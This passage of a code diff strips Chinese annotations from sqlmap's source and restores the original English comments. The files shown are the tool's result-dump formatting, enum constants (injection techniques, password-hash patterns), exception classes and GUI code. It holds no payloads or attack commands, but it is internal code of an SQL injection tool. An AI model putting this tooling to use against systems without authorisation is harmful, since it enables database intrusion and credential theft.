+    "sqlQuery": CONTENT_TYPE.SQL_QUERY,
+    "tableExists": CONTENT_TYPE.COMMON_TABLES,
+    "columnExists": CONTENT_TYPE.COMMON_COLUMNS,
+    "readFile": CONTENT_TYPE.FILE_READ,
+    "writeFile": CONTENT_TYPE.FILE_WRITE,
+    "osCmd": CONTENT_TYPE.OS_CMD,
+    "regRead": CONTENT_TYPE.REG_READ
 }

-# HTML实体编码对照表
+# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html
+
 HTML_ENTITIES = {
-    "quot": 34,     # 双引号
-    "amp": 38,      # &符号
-    "apos": 39,     # 单引号
-    "lt": 60,       # 小于号
-    "gt": 62,       # 大于号
-    "nbsp": 160,    # 不间断空格
-    "iexcl": 161,   # 倒感叹号
-    "cent": 162,    # 分币符号
-    "pound": 163,   # 英镑符号
-    "curren": 164,  # 货币符号
-    "yen": 165,     # 日元符号
-    # ... (其余HTML实体编码省略,与原文相同)
+    "quot": 34,
+    "amp": 38,
+    "apos": 39,
+    "lt": 60,
+    "gt": 62,
+    "nbsp": 160,
+    "iexcl": 161,
+    "cent": 162,
+    "pound": 163,
+    "curren": 164,
+    "yen": 165,
+    "brvbar": 166,
+    "sect": 167,
+    "uml": 168,
+    "copy": 169,
+    "ordf": 170,
+    "laquo": 171,
+    "not": 172,
+    "shy": 173,
+    "reg": 174,
+    "macr": 175,
+    "deg": 176,
+    "plusmn": 177,
+    "sup2": 178,
+    "sup3": 179,
+    "acute": 180,
+    "micro": 181,
+    "para": 182,
+    "middot": 183,
+    "cedil": 184,
+    "sup1": 185,
+    "ordm": 186,
+    "raquo": 187,
+    "frac14": 188,
+    "frac12": 189,
+    "frac34": 190,
+    "iquest": 191,
+    "Agrave": 192,
+    "Aacute": 193,
+    "Acirc": 194,
+    "Atilde": 195,
+    "Auml": 196,
+    "Aring": 197,
+    "AElig": 198,
+    "Ccedil": 199,
+    "Egrave": 200,
+    "Eacute": 201,
+    "Ecirc": 202,
+    "Euml": 203,
+    "Igrave": 204,
+    "Iacute": 205,
+    "Icirc": 206,
+    "Iuml": 207,
+    "ETH": 208,
+    "Ntilde": 209,
+    "Ograve": 210,
+    "Oacute": 211,
+    "Ocirc": 212,
+    "Otilde": 213,
+    "Ouml": 214,
+    "times": 215,
+    "Oslash": 216,
+    "Ugrave": 217,
+    "Uacute": 218,
+    "Ucirc": 219,
+    "Uuml": 220,
+    "Yacute": 221,
+    "THORN": 222,
+    "szlig": 223,
+    "agrave": 224,
+    "aacute": 225,
+    "acirc": 226,
+    "atilde": 227,
+    "auml": 228,
+    "aring": 229,
+    "aelig": 230,
+    "ccedil": 231,
+    "egrave": 232,
+    "eacute": 233,
+    "ecirc": 234,
+    "euml": 235,
+    "igrave": 236,
+    "iacute": 237,
+    "icirc": 238,
+    "iuml": 239,
+    "eth": 240,
+    "ntilde": 241,
+    "ograve": 242,
+    "oacute": 243,
+    "ocirc": 244,
+    "otilde": 245,
+    "ouml": 246,
+    "divide": 247,
+    "oslash": 248,
+    "ugrave": 249,
+    "uacute": 250,
+    "ucirc": 251,
+    "uuml": 252,
+    "yacute": 253,
+    "thorn": 254,
+    "yuml": 255,
+    "OElig": 338,
+    "oelig": 339,
+    "Scaron": 352,
+    "fnof": 402,
+    "scaron": 353,
+    "Yuml": 376,
+    "circ": 710,
+    "tilde": 732,
+    "Alpha": 913,
+    "Beta": 914,
+    "Gamma": 915,
+    "Delta": 916,
+    "Epsilon": 917,
+    "Zeta": 918,
+    "Eta": 919,
+    "Theta": 920,
+    "Iota": 921,
+    "Kappa": 922,
+    "Lambda": 923,
+    "Mu": 924,
+    "Nu": 925,
+    "Xi": 926,
+    "Omicron": 927,
+    "Pi": 928,
+    "Rho": 929,
+    "Sigma": 931,
+    "Tau": 932,
+    "Upsilon": 933,
+    "Phi": 934,
+    "Chi": 935,
+    "Psi": 936,
+    "Omega": 937,
+    "alpha": 945,
+    "beta": 946,
+    "gamma": 947,
+    "delta": 948,
+    "epsilon": 949,
+    "zeta": 950,
+    "eta": 951,
+    "theta": 952,
+    "iota": 953,
+    "kappa": 954,
+    "lambda": 955,
+    "mu": 956,
+    "nu": 957,
+    "xi": 958,
+    "omicron": 959,
+    "pi": 960,
+    "rho": 961,
+    "sigmaf": 962,
+    "sigma": 963,
+    "tau": 964,
+    "upsilon": 965,
+    "phi": 966,
+    "chi": 967,
+    "psi": 968,
+    "omega": 969,
+    "thetasym": 977,
+    "upsih": 978,
+    "piv": 982,
+    "bull": 8226,
+    "hellip": 8230,
+    "prime": 8242,
+    "Prime": 8243,
+    "oline": 8254,
+    "frasl": 8260,
+    "ensp": 8194,
+    "emsp": 8195,
+    "thinsp": 8201,
+    "zwnj": 8204,
+    "zwj": 8205,
+    "lrm": 8206,
+    "rlm": 8207,
+    "ndash": 8211,
+    "mdash": 8212,
+    "lsquo": 8216,
+    "rsquo": 8217,
+    "sbquo": 8218,
+    "ldquo": 8220,
+    "rdquo": 8221,
+    "bdquo": 8222,
+    "dagger": 8224,
+    "Dagger": 8225,
+    "permil": 8240,
+    "lsaquo": 8249,
+    "rsaquo": 8250,
+    "euro": 8364,
+    "weierp": 8472,
+    "image": 8465,
+    "real": 8476,
+    "trade": 8482,
+    "alefsym": 8501,
+    "larr": 8592,
+    "uarr": 8593,
+    "rarr": 8594,
+    "darr": 8595,
+    "harr": 8596,
+    "crarr": 8629,
+    "lArr": 8656,
+    "uArr": 8657,
+    "rArr": 8658,
+    "dArr": 8659,
+    "hArr": 8660,
+    "forall": 8704,
+    "part": 8706,
+    "exist": 8707,
+    "empty": 8709,
+    "nabla": 8711,
+    "isin": 8712,
+    "notin": 8713,
+    "ni": 8715,
+    "prod": 8719,
+    "sum": 8721,
+    "minus": 8722,
+    "lowast": 8727,
+    "radic": 8730,
+    "prop": 8733,
+    "infin": 8734,
+    "ang": 8736,
+    "and": 8743,
+    "or": 8744,
+    "cap": 8745,
+    "cup": 8746,
+    "int": 8747,
+    "there4": 8756,
+    "sim": 8764,
+    "cong": 8773,
+    "asymp": 8776,
+    "ne": 8800,
+    "equiv": 8801,
+    "le": 8804,
+    "ge": 8805,
+    "sub": 8834,
+    "sup": 8835,
+    "nsub": 8836,
+    "sube": 8838,
+    "supe": 8839,
+    "oplus": 8853,
+    "otimes": 8855,
+    "perp": 8869,
+    "sdot": 8901,
+    "lceil": 8968,
+    "rceil": 8969,
+    "lfloor": 8970,
+    "rfloor": 8971,
+    "lang": 9001,
+    "rang": 9002,
+    "loz": 9674,
+    "spades": 9824,
+    "clubs": 9827,
+    "hearts": 9829,
+    "diams": 9830
 }
--- a/src/sqlmap-master/lib/core/dump.py
+++ b/src/sqlmap-master/lib/core/dump.py
@ -5,96 +5,80 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的标准库
-import hashlib  # 用于生成哈希值
-import os  # 用于文件和目录操作
-import re  # 用于正则表达式
-import shutil  # 用于高级文件操作
-import tempfile  # 用于创建临时文件和目录
-import threading  # 用于多线程支持
-
-# 导入自定义模块和函数
-from lib.core.common import Backend  # 数据库后端相关
-from lib.core.common import checkFile  # 检查文件是否存在
-from lib.core.common import dataToDumpFile  # 将数据写入转储文件
-from lib.core.common import dataToStdout  # 将数据写入标准输出
-from lib.core.common import filterNone  # 过滤None值
-from lib.core.common import getSafeExString  # 获取安全的异常字符串
-from lib.core.common import isListLike  # 检查是否类似列表
-from lib.core.common import isNoneValue  # 检查是否为None值
-from lib.core.common import normalizeUnicode  # Unicode标准化
-from lib.core.common import openFile  # 打开文件
-from lib.core.common import prioritySortColumns  # 列优先级排序
-from lib.core.common import randomInt  # 生成随机整数
-from lib.core.common import safeCSValue  # 获取安全的CSV值
-from lib.core.common import unArrayizeValue  # 数组值转换
-from lib.core.common import unsafeSQLIdentificatorNaming  # SQL标识符命名
-from lib.core.compat import xrange  # 兼容Python2/3的range
-from lib.core.convert import getBytes  # 获取字节
-from lib.core.convert import getConsoleLength  # 获取控制台长度
-from lib.core.convert import getText  # 获取文本
-from lib.core.convert import getUnicode  # 获取Unicode
-from lib.core.convert import htmlEscape  # HTML转义
-from lib.core.data import conf  # 配置数据
-from lib.core.data import kb  # 知识库数据
-from lib.core.data import logger  # 日志记录器
-from lib.core.dicts import DUMP_REPLACEMENTS  # 转储替换字典
-from lib.core.enums import CONTENT_STATUS  # 内容状态枚举
-from lib.core.enums import CONTENT_TYPE  # 内容类型枚举
-from lib.core.enums import DBMS  # 数据库管理系统枚举
-from lib.core.enums import DUMP_FORMAT  # 转储格式枚举
-from lib.core.exception import SqlmapGenericException  # 通用异常
-from lib.core.exception import SqlmapSystemException  # 系统异常
-from lib.core.exception import SqlmapValueException  # 值异常
-from lib.core.replication import Replication  # 复制功能
-from lib.core.settings import DUMP_FILE_BUFFER_SIZE  # 转储文件缓冲区大小
-from lib.core.settings import HTML_DUMP_CSS_STYLE  # HTML转储CSS样式
-from lib.core.settings import IS_WIN  # 是否Windows系统
-from lib.core.settings import METADB_SUFFIX  # 元数据库后缀
-from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE  # 最小二进制磁盘转储大小
-from lib.core.settings import TRIM_STDOUT_DUMP_SIZE  # 标准输出转储大小限制
-from lib.core.settings import UNICODE_ENCODING  # Unicode编码
-from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT  # 不安全的转储文件路径替换
-from lib.core.settings import VERSION_STRING  # 版本字符串
-from lib.core.settings import WINDOWS_RESERVED_NAMES  # Windows保留名称
-from lib.utils.safe2bin import safechardecode  # 安全字符解码
-from thirdparty import six  # Python 2/3兼容库
-from thirdparty.magic import magic  # 文件类型识别库
+import hashlib
+import os
+import re
+import shutil
+import tempfile
+import threading
+
+from lib.core.common import Backend
+from lib.core.common import checkFile
+from lib.core.common import dataToDumpFile
+from lib.core.common import dataToStdout
+from lib.core.common import filterNone
+from lib.core.common import getSafeExString
+from lib.core.common import isListLike
+from lib.core.common import isNoneValue
+from lib.core.common import normalizeUnicode
+from lib.core.common import openFile
+from lib.core.common import prioritySortColumns
+from lib.core.common import randomInt
+from lib.core.common import safeCSValue
+from lib.core.common import unArrayizeValue
+from lib.core.common import unsafeSQLIdentificatorNaming
+from lib.core.compat import xrange
+from lib.core.convert import getBytes
+from lib.core.convert import getConsoleLength
+from lib.core.convert import getText
+from lib.core.convert import getUnicode
+from lib.core.convert import htmlEscape
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.dicts import DUMP_REPLACEMENTS
+from lib.core.enums import CONTENT_STATUS
+from lib.core.enums import CONTENT_TYPE
+from lib.core.enums import DBMS
+from lib.core.enums import DUMP_FORMAT
+from lib.core.exception import SqlmapGenericException
+from lib.core.exception import SqlmapSystemException
+from lib.core.exception import SqlmapValueException
+from lib.core.replication import Replication
+from lib.core.settings import DUMP_FILE_BUFFER_SIZE
+from lib.core.settings import HTML_DUMP_CSS_STYLE
+from lib.core.settings import IS_WIN
+from lib.core.settings import METADB_SUFFIX
+from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
+from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
+from lib.core.settings import UNICODE_ENCODING
+from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT
+from lib.core.settings import VERSION_STRING
+from lib.core.settings import WINDOWS_RESERVED_NAMES
+from lib.utils.safe2bin import safechardecode
+from thirdparty import six
+from thirdparty.magic import magic

 class Dump(object):
    """
-    这个类定义了用于解析和输出SQL注入结果的方法
+    This class defines methods used to parse and output the results
+    of SQL injection actions
    """

    def __init__(self):
-        """
-        初始化Dump对象
-        """
-        self._outputFile = None  # 输出文件路径
-        self._outputFP = None  # 输出文件指针
-        self._lock = threading.Lock()  # 线程锁,用于多线程同步
+        self._outputFile = None
+        self._outputFP = None
+        self._lock = threading.Lock()

    def _write(self, data, newline=True, console=True, content_type=None):
-        """
-        写入数据到输出
-        
-        参数:
-        data - 要写入的数据
-        newline - 是否添加换行符
-        console - 是否输出到控制台
-        content_type - 内容类型
-        """
        text = "%s%s" % (data, "\n" if newline else " ")

-        # API模式下的输出处理
        if conf.api:
            dataToStdout(data, contentType=content_type, status=CONTENT_STATUS.COMPLETE)

-        # 控制台输出
        elif console:
            dataToStdout(text)

-        # 文件输出
        if self._outputFP:
            multiThreadMode = kb.multiThreadMode
            if multiThreadMode:
@ -112,9 +96,6 @@ class Dump(object):
        kb.dataOutputFlag = True

    def flush(self):
-        """
-        刷新输出缓冲区
-        """
        if self._outputFP:
            try:
                self._outputFP.flush()
@ -122,9 +103,6 @@ class Dump(object):
                pass

    def setOutputFile(self):
-        """
-        设置输出文件
-        """
        if conf.noLogging:
            self._outputFP = None
            return
@ -137,25 +115,9 @@ class Dump(object):
            raise SqlmapGenericException(errMsg)

    def singleString(self, data, content_type=None):
-        """
-        输出单个字符串
-        
-        参数:
-        data - 要输出的数据
-        content_type - 内容类型
-        """
        self._write(data, content_type=content_type)

    def string(self, header, data, content_type=None, sort=True):
-        """
-        格式化输出字符串
-        
-        参数:
-        header - 标题
-        data - 数据
-        content_type - 内容类型
-        sort - 是否排序
-        """
        if conf.api:
            self._write(data, content_type=content_type)

@ -182,15 +144,6 @@ class Dump(object):
                self._write("%s: %s" % (header, ("'%s'" % _) if isinstance(data, six.string_types) else _))

    def lister(self, header, elements, content_type=None, sort=True):
-        """
-        列表形式输出数据
-        
-        参数:
-        header - 标题
-        elements - 元素列表
-        content_type - 内容类型
-        sort - 是否排序
-        """
        if elements and sort:
            try:
                elements = set(elements)
@ -215,30 +168,12 @@ class Dump(object):
            self._write("")

    def banner(self, data):
-        """
-        输出横幅信息
-        
-        参数:
-        data - 横幅数据
-        """
        self.string("banner", data, content_type=CONTENT_TYPE.BANNER)

    def currentUser(self, data):
-        """
-        输出当前用户信息
-        
-        参数:
-        data - 用户数据
-        """
        self.string("current user", data, content_type=CONTENT_TYPE.CURRENT_USER)

    def currentDb(self, data):
-        """
-        输出当前数据库信息
-        
-        参数:
-        data - 数据库数据
-        """
        if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):
            self.string("current database (equivalent to schema on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
        elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.DB2, DBMS.MIMERSQL, DBMS.MAXDB, DBMS.VIRTUOSO):
@ -247,51 +182,18 @@ class Dump(object):
            self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)

    def hostname(self, data):
-        """
-        输出主机名信息
-        
-        参数:
-        data - 主机名数据
-        """
        self.string("hostname", data, content_type=CONTENT_TYPE.HOSTNAME)

    def dba(self, data):
-        """
-        输出DBA权限信息
-        
-        参数:
-        data - DBA权限数据
-        """
        self.string("current user is DBA", data, content_type=CONTENT_TYPE.IS_DBA)

    def users(self, users):
-        """
-        输出数据库用户列表
-        
-        参数:
-        users - 用户列表
-        """
        self.lister("database management system users", users, content_type=CONTENT_TYPE.USERS)

    def statements(self, statements):
-        """
-        输出SQL语句列表
-        
-        参数:
-        statements - SQL语句列表
-        """
        self.lister("SQL statements", statements, content_type=CONTENT_TYPE.STATEMENTS)

    def userSettings(self, header, userSettings, subHeader, content_type=None):
-        """
-        输出用户设置信息
-        
-        参数:
-        header - 标题
-        userSettings - 用户设置数据
-        subHeader - 子标题
-        content_type - 内容类型
-        """
        self._areAdmins = set()

        if isinstance(userSettings, (tuple, list, set)):
@ -330,21 +232,9 @@ class Dump(object):
            self.singleString("")

    def dbs(self, dbs):
-        """
-        输出可用数据库列表
-        
-        参数:
-        dbs - 数据库列表
-        """
        self.lister("available databases", dbs, content_type=CONTENT_TYPE.DBS)

    def dbTables(self, dbTables):
-        """
-        输出数据库表信息
-        
-        参数:
-        dbTables - 数据库表数据
-        """
        if isinstance(dbTables, dict) and len(dbTables) > 0:
            if conf.api:
                self._write(dbTables, content_type=CONTENT_TYPE.TABLES)
@ -387,13 +277,6 @@ class Dump(object):
            self.string("tables", dbTables, content_type=CONTENT_TYPE.TABLES)

    def dbTableColumns(self, tableColumns, content_type=None):
-        """
-        输出数据库表列信息
-        
-        参数:
-        tableColumns - 表列数据
-        content_type - 内容类型
-        """
        if isinstance(tableColumns, dict) and len(tableColumns) > 0:
            if conf.api:
                self._write(tableColumns, content_type=content_type)
@ -467,12 +350,6 @@ class Dump(object):
                        self._write("+%s+\n" % lines1)

    def dbTablesCount(self, dbTables):
-        """
-        输出数据库表数量信息
-        
-        参数:
-        dbTables - 数据库表数据
-        """
        if isinstance(dbTables, dict) and len(dbTables) > 0:
            if conf.api:
                self._write(dbTables, content_type=CONTENT_TYPE.COUNT)
@ -518,12 +395,6 @@ class Dump(object):
            logger.error("unable to retrieve the number of entries for any table")

    def dbTableValues(self, tableValues):
-        """
-        输出数据库表值信息
-        
-        参数:
-        tableValues - 表值数据
-        """
        replication = None
        rtable = None
        dumpFP = None
--- a/src/sqlmap-master/lib/core/enums.py
+++ b/src/sqlmap-master/lib/core/enums.py
@ -6,7 +6,6 @@ See the file 'LICENSE' for copying permission
 """

 class PRIORITY(object):
-    # 定义优先级常量
    LOWEST = -100
    LOWER = -50
    LOW = -10
@ -16,7 +15,6 @@ class PRIORITY(object):
    HIGHEST = 100

 class SORT_ORDER(object):
-    # 定义排序顺序常量
    FIRST = 0
    SECOND = 1
    THIRD = 2
@ -26,7 +24,6 @@ class SORT_ORDER(object):

 # Reference: https://docs.python.org/2/library/logging.html#logging-levels
 class LOGGING_LEVELS(object):
-    # 定义日志级别常量
    NOTSET = 0
    DEBUG = 10
    INFO = 20
@ -35,7 +32,6 @@ class LOGGING_LEVELS(object):
    CRITICAL = 50

 class DBMS(object):
-    # 定义数据库管理系统常量
    ACCESS = "Microsoft Access"
    DB2 = "IBM DB2"
    FIREBIRD = "Firebird"
@ -66,7 +62,6 @@ class DBMS(object):
    VIRTUOSO = "Virtuoso"

 class DBMS_DIRECTORY_NAME(object):
-    # 定义数据库管理系统目录名称常量
    ACCESS = "access"
    DB2 = "db2"
    FIREBIRD = "firebird"
@ -97,7 +92,6 @@ class DBMS_DIRECTORY_NAME(object):
    VIRTUOSO = "virtuoso"

 class FORK(object):
-    # 定义分支数据库管理系统常量
    MARIADB = "MariaDB"
    MEMSQL = "MemSQL"
    PERCONA = "Percona"
@ -115,18 +109,15 @@ class FORK(object):
    OPENGAUSS = "OpenGauss"

 class CUSTOM_LOGGING(object):
-    # 定义自定义日志常量
    PAYLOAD = 9
    TRAFFIC_OUT = 8
    TRAFFIC_IN = 7

 class OS(object):
-    # 定义操作系统常量
    LINUX = "Linux"
    WINDOWS = "Windows"

 class PLACE(object):
-    # 定义位置常量
    GET = "GET"
    POST = "POST"
    URI = "URI"
@ -138,7 +129,6 @@ class PLACE(object):
    CUSTOM_HEADER = "(custom) HEADER"

 class POST_HINT(object):
-    # 定义POST提示常量
    SOAP = "SOAP"
    JSON = "JSON"
    JSON_LIKE = "JSON-like"
@ -147,7 +137,6 @@ class POST_HINT(object):
    ARRAY_LIKE = "Array-like"

 class HTTPMETHOD(object):
-    # 定义HTTP方法常量
    GET = "GET"
    POST = "POST"
    HEAD = "HEAD"
@ -159,18 +148,15 @@ class HTTPMETHOD(object):
    PATCH = "PATCH"

 class NULLCONNECTION(object):
-    # 定义空连接常量
    HEAD = "HEAD"
    RANGE = "Range"
    SKIP_READ = "skip-read"

 class REFLECTIVE_COUNTER(object):
-    # 定义反射计数器常量
    MISS = "MISS"
    HIT = "HIT"

 class CHARSET_TYPE(object):
-    # 定义字符集类型常量
    BINARY = 1
    DIGITS = 2
    HEXADECIMAL = 3
@ -178,13 +164,11 @@ class CHARSET_TYPE(object):
    ALPHANUM = 5

 class HEURISTIC_TEST(object):
-    # 定义启发式测试常量
    CASTED = 1
    NEGATIVE = 2
    POSITIVE = 3

 class HASH(object):
-    # 定义哈希常量
    MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z'
    MYSQL_OLD = r'(?i)\A(?![0-9]+\Z)[0-9a-f]{16}\Z'
    POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z'
@ -232,26 +216,22 @@ class MOBILES(object):
    XIAOMI = ("Xiaomi Mi 8 Pro", "Mozilla/5.0 (Linux; Android 9; MI 8 Pro Build/PKQ1.180729.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/87.0.4280.66 Mobile Safari/537.36")

 class PROXY_TYPE(object):
-    # 代理类型
    HTTP = "HTTP"
    HTTPS = "HTTPS"
    SOCKS4 = "SOCKS4"
    SOCKS5 = "SOCKS5"

 class REGISTRY_OPERATION(object):
-    # 注册表操作
    READ = "read"
    ADD = "add"
    DELETE = "delete"

 class DUMP_FORMAT(object):
-    # 导出格式
    CSV = "CSV"
    HTML = "HTML"
    SQLITE = "SQLITE"

 class HTTP_HEADER(object):
-    # HTTP头
    ACCEPT = "Accept"
    ACCEPT_CHARSET = "Accept-Charset"
    ACCEPT_ENCODING = "Accept-Encoding"
@ -286,19 +266,16 @@ class HTTP_HEADER(object):
    X_DATA_ORIGIN = "X-Data-Origin"

 class EXPECTED(object):
-    # 预期类型
    BOOL = "bool"
    INT = "int"

 class OPTION_TYPE(object):
-    # 选项类型
    BOOLEAN = "boolean"
    INTEGER = "integer"
    FLOAT = "float"
    STRING = "string"

 class HASHDB_KEYS(object):
-    # HASHDB键
    DBMS = "DBMS"
    DBMS_FORK = "DBMS_FORK"
    CHECK_WAF_RESULT = "CHECK_WAF_RESULT"
@ -315,12 +292,10 @@ class HASHDB_KEYS(object):
    OS = "OS"

 class REDIRECTION(object):
-    # 重定向
    YES = 'Y'
    NO = 'N'

 class PAYLOAD(object):
-    # 载荷
    SQLINJECTION = {
        1: "boolean-based blind",
        2: "error-based",
@ -360,14 +335,12 @@ class PAYLOAD(object):
    }

    class METHOD(object):
-        # 方法
        COMPARISON = "comparison"
        GREP = "grep"
        TIME = "time"
        UNION = "union"

    class TECHNIQUE(object):
-        # 技术
        BOOLEAN = 1
        ERROR = 2
        QUERY = 3
@ -376,32 +349,27 @@ class PAYLOAD(object):
        UNION = 6

    class WHERE(object):
-        # WHERE子句
        ORIGINAL = 1
        NEGATIVE = 2
        REPLACE = 3

 class WIZARD(object):
-    # 向导
    BASIC = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba")
    INTERMEDIATE = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs")
    ALL = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getHostname", "getUsers", "getPasswordHashes", "getPrivileges", "getRoles", "dumpAll")

 class ADJUST_TIME_DELAY(object):
-    # 调整时间延迟
    DISABLE = -1
    NO = 0
    YES = 1

 class WEB_PLATFORM(object):
-    # 网络平台
    PHP = "php"
    ASP = "asp"
    ASPX = "aspx"
    JSP = "jsp"

 class CONTENT_TYPE(object):
-    # 内容类型
    TARGET = 0
    TECHNIQUES = 1
    DBMS_FINGERPRINT = 2
@ -431,12 +399,10 @@ class CONTENT_TYPE(object):
    STATEMENTS = 26

 class CONTENT_STATUS(object):
-    # 内容状态
    IN_PROGRESS = 0
    COMPLETE = 1

 class AUTH_TYPE(object):
-    # 认证类型
    BASIC = "basic"
    DIGEST = "digest"
    BEARER = "bearer"
@ -444,18 +410,15 @@ class AUTH_TYPE(object):
    PKI = "pki"

 class AUTOCOMPLETE_TYPE(object):
-    # 定义自动补全类型
    SQL = 0
    OS = 1
    SQLMAP = 2
    API = 3

 class NOTE(object):
-    # 定义注释类型
    FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"

 class MKSTEMP_PREFIX(object):
-    # 定义mkstemp前缀
    HASHES = "sqlmaphashes-"
    CRAWLER = "sqlmapcrawler-"
    IPC = "sqlmapipc-"
@ -468,24 +431,20 @@ class MKSTEMP_PREFIX(object):
    PREPROCESS = "sqlmappreprocess-"

 class TIMEOUT_STATE(object):
-    # 定义超时状态
    NORMAL = 0
    EXCEPTION = 1
    TIMEOUT = 2

 class HINT(object):
-    # 定义提示类型
    PREPEND = 0
    APPEND = 1

 class FUZZ_UNION_COLUMN:
-    # 定义模糊联合列类型
    STRING = "<string>"
    INTEGER = "<integer>"
    NULL = "NULL"

 class COLOR:
-    # 定义颜色
    BLUE = "\033[34m"
    BOLD_MAGENTA = "\033[35;1m"
    BOLD_GREEN = "\033[32;1m"
@ -522,7 +481,6 @@ class COLOR:
    UNDERLINE = "\033[4m"

 class BACKGROUND:
-    # 定义背景颜色
    BLUE = "\033[44m"
    LIGHT_GRAY = "\033[47m"
    YELLOW = "\033[43m"
--- a/src/sqlmap-master/lib/core/exception.py
+++ b/src/sqlmap-master/lib/core/exception.py
@ -5,98 +5,74 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 定义一个SqlmapBaseException类，继承自Exception类
 class SqlmapBaseException(Exception):
    pass

-# 定义一个SqlmapCompressionException类，继承自SqlmapBaseException类
 class SqlmapCompressionException(SqlmapBaseException):
    pass

-# 定义一个SqlmapConnectionException类，继承自SqlmapBaseException类
 class SqlmapConnectionException(SqlmapBaseException):
    pass

-# 定义一个SqlmapDataException类，继承自SqlmapBaseException类
 class SqlmapDataException(SqlmapBaseException):
    pass

-# 定义一个SqlmapFilePathException类，继承自SqlmapBaseException类
 class SqlmapFilePathException(SqlmapBaseException):
    pass

-# 定义一个SqlmapGenericException类，继承自SqlmapBaseException类
 class SqlmapGenericException(SqlmapBaseException):
    pass

-# 定义一个SqlmapInstallationException类，继承自SqlmapBaseException类
 class SqlmapInstallationException(SqlmapBaseException):
    pass

-# 定义一个SqlmapMissingDependence类，继承自SqlmapBaseException类
 class SqlmapMissingDependence(SqlmapBaseException):
    pass

-# 定义一个SqlmapMissingMandatoryOptionException类，继承自SqlmapBaseException类
 class SqlmapMissingMandatoryOptionException(SqlmapBaseException):
    pass

-# 定义一个SqlmapMissingPrivileges类，继承自SqlmapBaseException类
 class SqlmapMissingPrivileges(SqlmapBaseException):
    pass

-# 定义一个SqlmapNoneDataException类，继承自SqlmapBaseException类
 class SqlmapNoneDataException(SqlmapBaseException):
    pass

-# 定义一个SqlmapNotVulnerableException类，继承自SqlmapBaseException类
 class SqlmapNotVulnerableException(SqlmapBaseException):
    pass

-# 定义一个SqlmapSilentQuitException类，继承自SqlmapBaseException类
 class SqlmapSilentQuitException(SqlmapBaseException):
    pass

-# 定义一个SqlmapUserQuitException类，继承自SqlmapBaseException类
 class SqlmapUserQuitException(SqlmapBaseException):
    pass

-# 定义一个SqlmapShellQuitException类，继承自SqlmapBaseException类
 class SqlmapShellQuitException(SqlmapBaseException):
    pass

-# 定义一个SqlmapSkipTargetException类，继承自SqlmapBaseException类
 class SqlmapSkipTargetException(SqlmapBaseException):
    pass

-# 定义一个SqlmapSyntaxException类，继承自SqlmapBaseException类
 class SqlmapSyntaxException(SqlmapBaseException):
    pass

-# 定义一个SqlmapSystemException类，继承自SqlmapBaseException类
 class SqlmapSystemException(SqlmapBaseException):
    pass

-# 定义一个SqlmapThreadException类，继承自SqlmapBaseException类
 class SqlmapThreadException(SqlmapBaseException):
    pass

-# 定义一个SqlmapTokenException类，继承自SqlmapBaseException类
 class SqlmapTokenException(SqlmapBaseException):
    pass

-# 定义一个SqlmapUndefinedMethod类，继承自SqlmapBaseException类
 class SqlmapUndefinedMethod(SqlmapBaseException):
    pass

-# 定义一个SqlmapUnsupportedDBMSException类，继承自SqlmapBaseException类
 class SqlmapUnsupportedDBMSException(SqlmapBaseException):
    pass

-# 定义一个SqlmapUnsupportedFeatureException类，继承自SqlmapBaseException类
 class SqlmapUnsupportedFeatureException(SqlmapBaseException):
    pass

-# 定义一个SqlmapValueException类，继承自SqlmapBaseException类
 class SqlmapValueException(SqlmapBaseException):
    pass
--- a/src/sqlmap-master/lib/core/gui.py
+++ b/src/sqlmap-master/lib/core/gui.py
@ -30,16 +30,12 @@ from lib.core.settings import VERSION_STRING
 from lib.core.settings import WIKI_PAGE
 from thirdparty.six.moves import queue as _queue

-# 定义全局变量
 alive = None
 line = ""
 process = None
 queue = None

 def runGui(parser):
-    """
-    运行GUI界面
-    """
    try:
        from thirdparty.six.moves import tkinter as _tkinter
        from thirdparty.six.moves import tkinter_scrolledtext as _tkinter_scrolledtext
@ -50,9 +46,6 @@ def runGui(parser):

    # Reference: https://www.reddit.com/r/learnpython/comments/985umy/limit_user_input_to_only_int_with_tkinter/e4dj9k9?utm_source=share&utm_medium=web2x
    class ConstrainedEntry(_tkinter.Entry):
-        """
-        限制用户输入的类
-        """
        def __init__(self, master=None, **kwargs):
            self.var = _tkinter.StringVar()
            self.regex = kwargs["regex"]
@ -70,9 +63,6 @@ def runGui(parser):

    # Reference: https://code.activestate.com/recipes/580726-tkinter-notebook-that-fits-to-the-height-of-every-/
    class AutoresizableNotebook(_tkinter_ttk.Notebook):
-        """
-        自动调整大小的Notebook类
-        """
        def __init__(self, master=None, **kw):
            _tkinter_ttk.Notebook.__init__(self, master, **kw)
            self.bind("<<NotebookTabChanged>>", self._on_tab_changed)
@ -112,100 +102,70 @@ def runGui(parser):
        window.deiconify()

    def onKeyPress(event):
-        # 当按键按下时，获取全局变量line和queue
        global line
        global queue

-        # 如果process存在
        if process:
-            # 如果按下的键是退格键
            if event.char == '\b':
-                # 将line的最后一个字符删除
                line = line[:-1]
            else:
-                # 否则将按下的键添加到line中
                line += event.char

    def onReturnPress(event):
